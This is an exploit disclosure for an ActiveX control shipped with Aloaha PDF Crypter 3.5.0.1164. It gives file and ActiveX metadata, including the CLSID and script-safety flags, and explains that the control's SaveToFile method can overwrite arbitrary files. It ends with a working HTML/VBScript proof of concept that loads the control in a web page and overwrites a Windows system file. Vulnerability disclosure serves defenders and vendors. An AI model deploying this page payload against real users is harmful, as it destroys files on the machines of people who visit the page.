Aloaha PDF Crypter (3.5.0.1164) ActiveX Arbitrary File Overwrite dos exploit
============================================================================================ TITLE: ============================================================================================ Aloaha PDF Crypter (3.5.0.1164) activex arbitrary file overwrite url: http://www.aloaha.com/ download: http://www.aloaha.com/download/aloaha_crypter.zip author: shinnai (http://shinnai.altervista.org) ============================================================================================ FILE INFO: ============================================================================================ File: C:\WINDOWS\system32\vbCrypt.dll InternalName: ebCrypt OriginalFilename: ebCrypt.DLL FileVersion: 2.0.0.2087 FileDescription: ebCrypt Main Module Product: ebCrypt ProductVersion: 2.0.0.2087 Language: English (United States) MD5 hash: b262cb93c555c3c9604502d071a783ec ============================================================================================ ACTIVEX INFO: ============================================================================================ ProgID: EbCrypt.eb_c_PRNGenerator.1 GUID: {B1E7505E-BBFD-42BF-98C9-602205A1504C} Description: eb_c_PRNGenerator Class Safety report: RegKey Safe for Script: False RegKey Safe for Init: False Implements IObjectSafety: True IDisp Safe: Safe for untrusted: caller,data ============================================================================================ BUG: ============================================================================================ This activex contains the "SaveToFile" which could be used to overwite arbitrary files on pc users. ============================================================================================ PROOF OF CONCEPT ============================================================================================ <html> <object classid='clsid:B1E7505E-BBFD-42BF-98C9-602205A1504C' id='test' ></object> <script language='vbscript'> test.SaveToFile "c:\windows\_system.ini" </script> </html> ============================================================================================